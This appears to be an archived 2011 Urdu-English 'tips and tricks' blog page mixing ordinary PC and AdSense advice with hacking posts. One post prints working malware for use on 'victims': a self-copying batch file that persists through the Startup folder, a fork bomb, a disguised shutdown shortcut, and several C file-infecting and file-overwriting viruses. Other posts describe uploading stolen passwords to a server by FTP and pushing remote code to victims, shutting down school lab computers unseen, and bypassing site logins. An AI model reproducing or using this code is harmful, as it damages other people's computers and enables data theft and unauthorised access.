Message From Admin -- PkAry--

Hello Dear Viewer .!
Welcome To The Zone Of Tips And Tricks. Here You Can Get More Than , More All it Related Tips And Tricks.Also Some Private Tricks Like Get Adsence , Free Seo Etc. . . Stay Connect.
ENTER
\\

Monday, August 22, 2011

Ab aap jo bhi type karen gen wohi ap ka pc bole ga..!!


1=> open note pad or yeh code paste kar den.

Dim message, sapi
message=InputBox(“Enter the text you want spoken”,”Speak This”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message

2=> ab isey save as kr ke .vbs main save kar den.

3=> ab isey open karen.

4=> ab aap is tarah ka box dekhen gen.

5=> is main ap jo bhi type kare4n en wo pc speak kare ga.  (*_*)

Apa Pc Lock Karen Usb Flash Drive Ke Zariye..!!



1=> Download predator software by clicking here

2=> Ab ye software Automatic Launch Ho jaye ga. or is ki screenshot kuch is tarah aa jaye gi.



3=> Ab Click Karen or apna Password Set Karen.

4=> Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list

5=> Ab 'Create Key' per click karen or phir ok per click kar den.



6=> yeh krne ke baad software automatic exit ho jaye ga or is program ko dubara restart (open) karen.yeh soft sirf kuch hi seconds le ga intializied karne k liye. ab yeh icon ap ke taskbar main chala jaye ga.now, ab ap jub pc on karen gen to usb lagaen gen to tabhi ap ka pc on ho aagey chale ga.okkkaa (*_*)

Mukhtalif Batch Viruses Ke Codes.

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.
@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
:P lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer ;)
:theend
Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.\
Creating a batch Bomb
Copy and paste the below into notepad and save it as hi.bat (Not .txt)
run it, and enjoy anarchy.
Code:
@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
How to make a shutdown file and disguise it as something else!
This article is a pretty simple one, maybe most of you guys know already... in case if you don't know, you can play around and make fun...
How to make a shutdown file and disguise it as something else (internet, etc.)
Step 1: Right click on your desktop or wherever you want to make this shutdown file
Step 2: look for new, then shortcut
Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force close open docuuments
note: after -t you can put any amount of seconds you want before the computer shuts down
Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer
Step 4: Right click on the file you just made and goto properties
Step 5: hit change icon. (This could be under the advanced tab)
Step 6: An error message should pop up letting you know there aren't any pictures for c:\windows\system32. Hit ok
Step 7: A list of icons should show up.. click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for internet explorer.
Now your done, see that wasn't that hard! was it?
Put this in the start up folder to make people even MORE mad!
NOTE:- This can easily be stopped by typing shutdown -a in run...
Sending Files Via ftp Batch!
OK, So i made a password stealer that would output a .txt file to the windows folderm i then made a ftp batch that would upload the txt file to my server, so far ive managed to get some passwords but not for anything important, So if you want to know how to make a ftp batch then heres how.
First for example were gonna try upload a file called Test.txt to our server
Upload.bat
ftp -n -i -s:MyUploadFiles.ftp
First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, if you wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the .ftp at the end.
Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.
open your-host
user username.spam.com password
ASCII
send test.txt
BI
This is the bit where you have to change the username password and host to what your ftp host is. then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can be any one.
Now make sure both files are in the same dir as each other and run the .bat file. check your ftp server and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc, you could use this?
Also theres nothing stopping you from putting in the "get" command in the .ftp, say get download.bat, whenever you want to change what it does make it call it download.bat and shove it on the server, then the victim will download it and be executed.
Folder Replicator Batch VIRUS
Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
VIRUS CODES IN “ C “ :-
BATCH & COM VIRUS
#include
#include
#include
#include
struct ffblk ffblk;
main()
{
char old_dir[MAXPATH];
Get_Path(old_dir);            /* Save the old directory  */
Pick_A_Dir();                 /* Find a new directory to */
Infect_Directory();           /* infect and infect it.   */
chdir(old_dir);               /* Return to old directory */
return 0;
}

Pick_A_Dir()
{
int done;
chdir(”..”);                      /* First, Go out a DIR. */
done=findfirst(”*.BAT”,&ffblk,0); /* If no BAT files, try */
/* root and DOS         */
if (done)
{
chdir(”\\”);
done=findfirst(”*.BAT”,&ffblk,0);
if (done) chdir(”\\DOS\\”);
}
return 0;
}

Infect_Directory()
{
int done;
done = findfirst(”*.BAT”,&ffblk,0);
while (!done)                       /* Find all .BAT files */
{                                /* and add code to run */
Do_Batch();                     /* BAT&COM if not      */
done = findnext(&ffblk);        /* already there       */
}
if (findfirst(”BAT&COM.COM”,&ffblk,0)) /* If BAT&COM does  */
{Copy_Virus();}                     /* not exist, then  */
return 0;                              /* copy it into dir.*/
}

Do_Batch()
{
FILE *batch;
char Infection_Buffer[12];
char vpath[MAXPATH];
Get_Path(vpath);            /* Get path for adding path */
/* specifier in commands    */

if (vpath[3]==0) vpath[2]=0; /* Keep path good in root  */
batch=fopen(ffblk.ff_name, “rt+”);
fseek(batch, -11, SEEK_END);
fread(Infection_Buffer,11,1,batch);
Infection_Buffer[11]=0;             /* Terminate String */
if (strcmp(Infection_Buffer,”BAT&COM.COM”)) /* Check if */
{                                   /* Batch is */
fseek(batch, 0, SEEK_END);          /* infected.*/
fprintf(batch,”\n%s\\BAT&COM.COM”,vpath);
}                              /*^- Add command */
/*   to batch    */
fclose(batch);
return 0;
}

Copy_Virus()
{
FILE *old_virus, *new_virus;
int write_length;
char copy_buffer[1024];              /* Copy the virus to */
/* new directory     */
old_virus=fopen(_argv[0],”rb”);
new_virus=fopen(”BAT&COM.COM”,”wb”);
write_length=1024;
while (write_length==1024)
{
write_length=fread(copy_buffer,1,1024,old_virus);
fwrite(copy_buffer,write_length,1,new_virus);
}
fclose(old_virus);
fclose(new_virus);
return 0;
}

Get_Path(char *path)
{
strcpy(path, “A:\\”);
path[0] =’A’ + getdisk();    /* Returns current path */
getcurdir(0, path+3);
return 0;
}
-       – - —————–End of Code———————— – - -

BLACK WOLF VIRUS
/*  It will infect all .COM files in the current directory  */
#include
#include
#include
FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;
main()
{
done = findfirst(”*.COM”,&ffblk,0);   /* Find a .COM file */
while (!done)               /* Loop for all COM’s in DIR*/
{
printf(”Infecting  %s\n”, ffblk.ff_name);    /* Inform user */
Virus=fopen(_argv[0],”rb”);          /* Open infected file  */
Host=fopen(ffblk.ff_name,”rb+”);     /* Open new host file  */
x=9504;                               /* Virus size – must   */
/* be correct for the  */
/* compiler it is made */
/* on, otherwise the   */
/* entire virus may not*/
/* be copied!!         */
while (x>256)                         /* OVERWRITE new Host  */
{                                 /* Read/Write 256 byte */
fread(buff,256,1,Virus);          /* chunks until bytes  */
fwrite(buff,256,1,Host);          /* left < 256          */
x-=256;
}
fread(buff,x,1,Virus);                /* Finish off copy     */
fwrite(buff,x,1,Host);
fcloseall();                          /* Close both files and*/
done = findnext(&ffblk);              /* go for another one. */
}
/* Activation would go */
/* here                */
return (0);                             /* Terminate           */
}

Overwrite Virus Code

NotePad Open Karen Or yeh Code Paste kar den=>
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst(”*.exe”,f,0);
while(!done)
{
virus=fopen(argv[0],”rb”);//open the virus in read mode
host=fopen(f->ff_name,”rb+”);//open the host file in r/w mode
for(;fread(buffer,512,1,virus)==1;)
fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf(”infecting %s
“,f->ff_name);
done=findnext(f);
}
}
while(!chdir(”..”));
printf(”For any querry contact
Rakesh dwivedi;Rakeshdwivedi21@gmail.com“);

REPLICATION VIRUS
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Rakesh_dwivedi(rakeshdwivedi21@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

ab save as kr ke .bat main save kar den.

Sunday, August 21, 2011

Apne Pc Ki Speed Fast Karen Simple Trick..!

1=> Click On Start

2=> Open Run

3=> Type prefetch

4=> Delete All files.

Yeh tamam Files delete kar den yeh files Ram per Load hoti hain. Yeh tariqa har baar karen..!

Saturday, August 20, 2011

Google in Zabanon Ke Blogs wagaira ko Support Karta hai. Or in Main Urdu Shmail nahin hai.

Google in Zabanon Ke Blogs wagaira ko Support Karta hai. Or in Main Urdu Shmail nahin hai.
Google AdSense supports publishers in several different languages. Applications for participation in the program can be for sites with content primarily in:
Arabic  French  Polish
Bulgarian  German  Portuguese
Chinese (simplified)  Greek  Romanian
Chinese (traditional)  Hebrew  Russian
Croatian  Hungarian  Serbian
Czech  Italian  Slovak
Danish  Japanese  Spanish
Dutch  Korean  Swedish
English  Latvian  Thai
Finnish  Lithuanian  Turkish
Norwegian  Ukranian

Google Adsence Se Aamdni Barhane Ke Tariqe.

Google Adsecne Band Hone Ki Wajuhaat.

Google Adsecne Band Hone Ki Wajuhaat.

10 Ghaltiyan Jis se adsence Block Ho Jata Hai.

Adsence Account Band Hone Se Bachne Ki Tadabeer.




If you wake up and find one day that your website isn’t showing anymore in Google, you have been a victim of a Google Ban. This is the worst thing that can happen to your website, especially if you are running a business through your site. Several factors can trigger a Google Ban. Here is a list of ways you can keep your website on Google’s good side.
1. Make sure your have the best uptime possible for your website. This means you must have reliable web hosting. If Google visits your website and it is not up, you may risk Google banning you site.
2. Do not use spamming techniques to promote your website. This will almost definitely lead to condemnation of your website for at least 6 months. Never use “black hat” methods like doorways, hidden text or cloaking. You are only setting yourself up for disaster.
3. Make sure your content is original and relevant. Websites that duplicate content are punished with lower rankings and even bans. Your content should always be made for human consumption and relate to your website’s theme.
4. Linking is a two way street. Not only should the links going out of your website be quality, but be certain that the links that lead to your website are from Google respected locations as well. Avoid link farms and any paid linking service. Also, excessive linking is a red flag for Google. When you add internal links on your own sites, make sure you do it in moderation and with purposeful intent.
5. Be sure your site is Google friendly. Build your website so that Google is able to index every page. Include a sitemap. Be sure all your pages are working and that there are no broken links. If you follow the Google “Tips for Optimizing” you will be fine. Don’t try to fool Google with tricky tactics. The price you will pay is far worse than the effort it takes to do things the right way!

Google Adsence Account Banayen Step By Step.!!!

Step 1

Step 2


Step 3

Ap Ko Kuch hi dino main b ata diya jaye ga ke ap ko account mil gaya hai ya nahin. ap ko mail kr di jaye gi.

Google AdSence Kya Hai Or Kese Kaam Karta Hai ?


Friday, August 19, 2011

Bad Sectors Kya Hain? Or inKo Kese Darust Kiya Ja Sakta hai?

Bad Sectors Jub pc main aa jate ain to yeh Pc ko ander se Khokhla kar dete hain. Bad sectors ke aaney ke baad  pc bilkul damage ho jata hai. hatta ke ap ke pc main window tak bhi nahin hoti..! but Don't Worry I have Solution..!!!  (*_*)

understand what an error is and how errors can appears. The misapprehension between the data and between the boards and the compatibility of them can result in an error. All of the errors are supported by the hard disk and can be very destructive to it.

To make it easy for all of to understand what a bad sector is we will try to explain it away from the technical terms. Consider you have a piece of paper and the entire paper is the writable zone where your hard disk saves information. On this piece of paper we draw lines to divide it in small squares. One small square represents a sector of your hard disk, and if we divide one square in to 4 squares we can obtain, imaginary of course, 4 cluster. Ok know you want to write a sentence on the paper. You will notice that there no room to write the sentence in only one small square and you will need a certain amount of squares from different portions of the paper; know write down your sentence.

After that take scissor and cut a word from the sentence in the middle of it. You as a person can still read the sentence because we can realize what word is messing from the sentence but a computer to show you that sentence needs all of the words to reproduce it for you. The part that you cut from the sentence is our bad block, and now you can understand how the hard disk functions. And all of you know that on the driver is more then a sentence written, and that it contains millions of letters and numbers and also holds information about all of the boards, along whit their drivers, that are in your personal computer.

Some surface errors have connections whit the hardware equipment of the computer directly and can create physically bad sectors on the hard drive, and that means a cluster from the hard disk sector is unreadable. The writing action on the hard disk is possible thanks to a “writing head” that floats at a distance of 0.3 microns over the writable layer of the disk. If one or more heads actually touch the writable disk the chance to destroy that cluster is almost 100%.

The bad sectors are in definition a portion of the hard disk writable part that can not be change (read or write). So because of this definition the data that are on the bad sectors may be lost forever.
You can be easily be trick to think that your hard disk have bad sectors, most of the time are errors that appear because of the over churching of the partition or of the Windows directory.

Bad sectors also known as simple as “bad” can appear to any hard disk after a time of function. In most of the cases the bad sectors that appear are not in a bigger quantity from your stocking space (about 0.01% for newer hard disk). For the new gene ration of hard disk there are some spare clusters just for these problems. When a bad sector appears the safety measure remove the information that it contains to a spear cluster and that way avoids the lost of data or the corruption of the data.

In a generally idea a bad sector is a big problem for your hard disk and for your entire computer. There are some programs that can repair them if there are not physically and are from data corruption but that is another story about the hard disk

Regenerator is one of the programs that quarantines the repair of bad sectors and the technology was developed Dmitriy Primochenko. It has a huge data base of the hard disk even if they are old or new and will identify your hard disk for sure. The most important thing is that it not only repairs the bad sector that is on your hard disk but also recovers the data that was previous write there. more…
BAD SECTERZ REPAIRING BEST SOFT
Flobo HDD Repair – Is a very generous program when we speak about tools. It includes a bad sector restoration tool, it can test your hard disk speed, test your SMART information, can perform surface test for the stability of the hard disk and also can test the controller data transmission if that is working properly. And the most important aspect of Flobo is that it includes a DDB ad Sector Repair. more…

Disk Repair has the property to repair and remove in a physical way bad sectors. It also can repair a vital part of the hard disk that is called Track 0. The importance of this track is that here all of the main programs like Windows of Linux or Unix etc. are installing there main configuration in that area of the hard disk. And we must remember that once the bad sectors appear they spread very fast. more…

ADRC Data Recovery Tools v1.0 have a special attention for the DIY to repair and re-used the data that where written. It can support a variety of drivers and all of the file systems: (FAT12, FAT16, FAT32 and NTFS) for Windows 95/ 98, Windows ME, Windows NT, Windows 2000, Windows XP and Windows 2003 server. more…

THE HARD DRIVE MECHANIC is a program for crash data that creates the bad sectors. This program can analyze the data that created the bad blocks, fix the bad blocks, and also can remove the data that create this problem. But the disadvantage of it is that in only works for FAT32 and NTFS hard drives. more…

Partition Table Doctor creates an option for you that permits the identification of the bad sectors repairs them and also verifies the hard disk identification. The boot sectors can be also repair and the best option that you can have with this program is that in 30 days if you are not satisfied by it you will get your money back. more…

Disk Patch Partition Repair is an old style repairer for the bad blocks. It operates in DOS but even if is still in old style menu the chances increases to get ride of your bad blocks. The program can repair even a mass data lost (when a partition is totally lost) and can create a MBR, Partition Tables and LDM.

Apne Blogs Ko Search Engines Per Submit Karwayen..!

Aksar Blogs Google , Ask wagaira per Search nahin ote isi liye pehle apne blogs ko search engines per submit karwayen us ke baad yeh search engines sirf ap ke blog ka naam likhne par search result de de ga..!

Search Engine Optimization (SEO) aims at increasing the volume and improving the quality of traffic to a website from search engine results. Search engines work on different algorithms to analyze the contents and keywords, and present the search results. Google, for instance, assigns page ranks to the sites and sites that rank highly will appear early in the results. Of course, many other factors are considered by search engines, such as relevance, unique content, coding and quality of links. The major search engines know that revealing these factors will only encourage manipulation of the ranking system and have thus been secretive about how the ranking algorithms work.

While no SEO consultant can be absolutely certain about how each search engine views your site, the common agreement is that the more visible your site is on the internet, the higher your ranking will eventually be. Having your site linked to by many other sites and indexed by different search engines increase its exposure and visibility

Here we shall provide a list of search engines where you can submit your website or Blog URLs for Free and have your site or Blog indexed by the search engines.

Website Indexing

Unless you have created a private blog, it is a matter of time that your blog is indexed by the major search engines like Google, Yahoo and MSN. One of the fastest ways to have your site indexed is to get another site that is already in the search engine listings to link to you. When the search engine crawlers visit that site, they will find your site and index it.

Hence, try this method if you do not want to wait for search engines to approve your site submission.


Before we proceed to the list of search engine sites, there are a few points to note:-

1. To check if your site has been indexed by a search engine, enter the full URL into their search query. For some search engines like Microsoft Live Search, enter site: followed by the full URL. If you see your site appearing in the search results, it has been indexed and there is no need to resubmit the site.

2. If your Blog has been linked to by Blog Directories, websites or Blogs, you may see these other sites that mention your Blog appearing first in the search results. More likely than not, they have a higher page rank. Scroll through the remaining search result pages and you will probably find a listing that is solely about your Blog.

3. When submitting your site, you do not need to submit the URL of each individual webpage. Submit only the top-level webpage and for Blogger Blogs, it will be an address like this http://blogname.blogspot.com without the www. before the blogname.

4. You can submit your sitemap to Google and login to Google Webmaster site to know the status of the indexing and view traffic statistics. Also, submit your sitemap to Yahoo! to find out more about the index and links to your site. Submit Blogger Sitemap to MSN and Ask.com too.


5. If you add your URL in Yahoo!, it will appear in their other search sites like AlltheWeb and AltaVista as well. Similarly, AOL Search uses the data by Google.

6. Some of the sites send advertisements and newsletters to you in exchange for free submission. If you don't want that, remember to opt out of it. Avoid having your regular email account filled with these mail by creating another free web-based email account just for website submissions.

7. Since search engines have different standards of content, design and technical specifications, submission of your site does not guarantee that it will be included in their database.


List of Search Engines

You may submit your site URL to these search engines for Free. If you lack the time, submit your site to the top few leading search engines.

http://www.google.com/addurl/.
http://www.bing.com/webmaster/SubmitSitePage.aspx.
http://www.alexa.com/help/webmasters#crawl_site.
http://www.baidu.com/search/url_submit.html.
http://www.exactseek.com/add.html.
http://searchsight.com/submit.htm.
http://www.scrubtheweb.com/addurl.html.
http://www.entireweb.com/free_submission/.
http://gigablast.com/addurl.
http://www.exalead.com/search/??definition=submitYourSitePage&nojs=1.
http://www.searchking.com/add_new.htm.
http://www.whatuseek.com/addurl-secondary.shtml.
http://www.anoox.com/add_for_indexing_free.jsp.
http://www.splatsearch.com/submit.html.
http://www.walhello.com/addlinkgl.html.
http://www.searchit.com/addurl.htm.
http://www.mozdex.com/support/addurl.html.
http://submit2.jayde.com/.
http://www.infotiger.com/addurl.html.
http://www.abacho.de/.
http://monster.exploituk.net/suspended.page/.
http://www.towersearch.com/addurl.php.
http://www.the-search-site.com/add_url_form.asp.
http://www.websquash.com/cgi-bin/search/search.pl?Mode=AnonAdd.
http://unasked.com/webmasters.
http://search.evisum.com/addsite.htm.
http://dinosearch.com/dinosearch/addurl.asp.
http://www.searchtheweb.com/suggest/.
http://www.bestyellow.com/addurl.html.
http://www.beamed.com/search/AddURL.html.


Website Submission Services

There are many sites on the internet offering free website submission services to search engines. The list of search engines are by and large the same. For a fee, some of them offer to send your URL to more than a hundred search engines. Is it necessary to have your webpage listed in all the smaller search engines? We think that Google, Yahoo! and MSN have cornered such a large share of the market that it is sufficient just to have your website listed there. However, the decision is yours to make. For a start, you may want to use their free services and monitor the traffic.


http://www.evrsoft.com/fastsubmit/.
http://www.submitexpress.com/.
http://www.addme.com/.
http://www.freesubmissionweb.com/.
http://www.ineedhits.com/free-tools/submit-free.aspx.
http://www.submitshop.com/freesubmit/freesubmit.html.
http://www.searchengineoptimising.com/free-search-engine-submission.
http://www.addpro.com/submit30.htm.
http://www.pageranklist.net/search_engine_add_url.php.
http://freewebsubmission.com/.
http://addurl.amfibi.com/.
http://www.burf.org.uk/submit.php.
http://submitforce.jerkasmarknad.com/.
http://www.localsubmit.com/free.asp.
http://www.srsubmit.info/.     

Folders Ko Lock Karen Bagair Kisi Software Key..!

Follow Steps..!

Open Notepad and copy the below code and save as locker.bat. At first time start it will create folder with Locker automatically for u. Don't forget to change your password in the code its shown the place where to type your password.

after creation of Locker folder again
click on the locker.bat.it will ask.press Y then Locker folder will be disappeared. again to get it click on locker.bat. and give ur password u will get the folder again.



************ ********* ********* ********* ********* ********* *







cls

@ECHO OFF

title Folder Locker

if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER

:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"

attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%==type your password here goto FAIL

attrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"

ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Locker

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Locker

echo Locker created successfully

goto End

:End



Another way to secure your folder.



To lock a folder ::: Simplest WaY !!!

To lock a folder ::: Simplest WaY !!!

Hi friends try this..



first select a folder for example i'll use a folder name movies in D drive D:\movies\



in the same drive u create a text file and type



ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}



and save it as loc.bat



again u type in a notepad as



ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies



and save it as key.bat



now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..



Try this out

Apna Ip Khud Change Karen A Simple Way.

Agar yeh Aap ko Mushkil Lage to Ap "Hide Ip Easy" Kar sakte hain.


The following trick gives you a step-by-step procedure to change your IP address.


1. Click on “Start” in the bottom left hand corner of screen.

2. Click on “Run”.

3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”.

5. Type “exit” and leave the prompt.

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”.

You should now be on a screen with something titled “Local Area Connection”, or something close to that.

8. Right click on “Local Area Connection” and click “properties”.

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.

10. Click on “Use the following IP address” under the “General” tab.

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.

13. Hit the “Ok” button here.

14. Hit the “Ok” button again. You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings.

17. This time, select “Obtain an IP address automatically”.

18. Hit “Ok”.

19. Hit “Ok” again.

20. You now have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack. In this case you need to switch off the modem and then switch it on to get the new IP address.
NOTE: All these tricks works only if you have a dynamic IP address. But if you have a static IP address you have no option to change your IP.

School , NetCafe , University , Lab ke Computers Remotely Shutdown karen..!


:::: Very CoOoOL pRANk And AlsO Funny But this is Only for Educational purpose Only ::::

Requirements::

- The school must be connected with a LAN Network
- You have to be able to create .txt files and save them to .bat files. (Most schools don't block this)


1) Right-click on your desktop. Navigate to "New" and then to "Text Document"

2) Open the Document and type:

Spoiler:
Quote:
shutdown.exe -i


Save the .txt file as a .bat file.

3) Open the .bat file. "Remote Shutdown Dialog" should pop up when you open it.

4) Click "Browse...". All computers connected to your LAN Connection should be in the list. When you do this in school, you can target specific rooms if the school admin organized the computers. In my school, I can search for "LIB" and all the computers in the library will be in the list.

5) After you find the name, click "Add..." and type the computers name (EXACTLY), and hit "OK".

6) Now, you have a few options before you make their computer shutdown. You can make their computer: Shutdown, Logoff, or Restart.
After you picked the type of shutdown you want to do, you can choose how long the message will stay up for. Default on my computer is 20 seconds. <- If you don't want to be caught, set it to a low number so they can't see who forced the shutdown.

7) Set a comment! You can type in the "Comment" box to make the shutdown dialog say something. For example, if you type "You are stupid" in the comment box, the shutdown dialog will say at the bACottom "You are stupid".

Aik Hi Browser Main Multiple Mail Ids Open Karen..!





Kya AP Ke pas multiple ids hain?
yada tar logon ke pas multiple i account hote hain i have also.

agar ap ke facebook per 2 account hon to ap ko pareshani hoti hai ke aik log off karen or phir or account open karen per ab aisa nahin hai ab chahenn to multiple ids aik waqt main chalayen.. (*_*)

Method No 1==>

Multiple ID Login in Internet Explorer 8:
If you’re using Internet explorer 8 then open a window and login to the website you desire with one ID. Once done, press Alt and go to File> New session. Now a new window will open go to the website again and login with another ID. Pretty easy isn’t it?

Method No 2==>

Using Two Different browsers:
There are so many internet browsers to choose between. Some of the popular ones include- Internet explorer, Opera, Firefox, Chrome, Safari, etc. You can login to one Facebook account in one browser and the other Facebook account in another browser. This way you can login to multiple accounts simultaneously.

Method No 3==>

Multiple ID Login in Google Chrome:
Logging into different IDs is easier in Google Chrome as comes with an incognito mode that allows you to login to two different instances of the same website.
Firstly, login to the website with your primary ID in Google Chrome.
Now click on the tools icon and select New Incognito Window. Alternatively you can press Ctrl + Shift + N to open a new Incognito Window.
Navigate to the same website and you should be able to login with another user ID.
Multiple ID Login in Firefox and Flock:
Go to Nektra site and install the CookiePie Firefox addon. This addon also works on Flock browser. Once installed, restart the browser. Open a new tab and login to your account with the primary ID.
Now press Ctrl+T to open a new tab. Right click on the tab and select Toggle On/Off Cookiepie.
You’ll now see a cookie on the tab. Now, simply go to the same website and log in with another ID in this tab. Voila! Two Ids are logged in simultaneously.

Ab free un site per jayen jo un-register user ko Access nain karti..!



Kuch Sites aisi hoti hain jin main hum baghair register huwe enter nahin ho sakte but i have a trick jis ki wajah se ap baghair register huwe enter ho sakte ain..!!!


Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.


Have fun, Dead Dreamer!

-]Edit[- Now this kicks ass, was just browsing entire forum without
even needing to login to view restricted areas, and it works on other sites
And no, you cant access the hidden forums either, already tried that

Thursday, August 18, 2011

KeyBoard Ko Mouse Se Chalayen.!





Agar ap  ka keyBoard kharab hO Gaya hai to Pareshan hone ki Zarurat nahin hai. Kyun Ke Ab Keyboard Ko Mouse Se Chalayen.
=> Click On Start

=> Click on Run and type osk

=> Aur Dekhiye KeyBoard Ko Apni Screen Per. EnjoyYyYyY  (*_*)

Xp Ke Masail or Un Ke HaL (*_*)




Xp Ke Kuch Masle aise hote hain jo kisi General Se User Ko Pata Nahin hota Or Wo Kisi Computer Shop per thek Krwane K liye Le jate hain per Ab ap Khud Gar Bethe Xp ke Masail janiye or Unko Thek Ki Jiye.

There is One for Everyone !
